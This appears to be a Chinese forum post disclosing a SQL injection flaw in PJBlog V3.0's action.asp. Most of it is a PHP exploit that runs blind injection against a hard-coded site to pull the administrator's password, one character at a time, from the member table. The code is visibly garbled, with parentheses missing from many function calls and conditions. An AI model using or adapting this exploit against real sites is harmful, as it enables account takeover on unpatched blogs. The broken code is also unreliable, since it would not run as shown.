目前还有很多网站的没有打补丁, 此文发布时官方已经打了补丁。 希望大家不要做什么破坏哦!
现在网络的网站漏洞真的让我无语啊 .....
恩呵呵 ..... z 这次 pjblog 漏洞在漏洞文件: action.asp
第 14 行 :
strcname=request "cname"
set checkcdb=conn.execut "select * from blog_Cont where log_cname="""&strcname&""""
扔个 exp 好不好使看各位造化鸟。
<?php
/*
PJblog V3.0 0dai exp
09.04.22
*/
$url="http://www.pjhome.net"; // 注入地址
$var_name="puterjam"; // 管理员
$var_key="check_right";
if $_SESSION["LenI"] {
$LenI=$_SESSION["LenI"];
}else{
$LenI=1;
}
for $i=$LenI;$i<=40;$i++ {
if $_SESSION["LenDo"] {
$StaAsc=$_SESSION["LenDo"];
}else{
$StaAsc=31;
}
echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
for $j=$StaAsc;$j<=127;$j++ {
$newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
$var_pagelen=file_get_cont $newurl ;
$var_kei ; $var_newpagelen=strpo $var_pagelen.
if $var_newpagelen == true {
$_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr $j ;
unset $_SESSION["LenDo"] ;
$_SESSION["LenI"]=$i+1;
doReload ;
break;
}
if $j == $StaAsc+10 {
doReload ;
break;
}
}
}
if $_SESSION["LenI"]==40 && ! $_SESSION["LenDo"] { echo $_SESSION["tmpPassWord"]; }
function doReload {
?>
<script language="javascript">
<!--
1000 ; window.setTimeout 'location.reload '.
//-->
</script>
<?php
}
?>










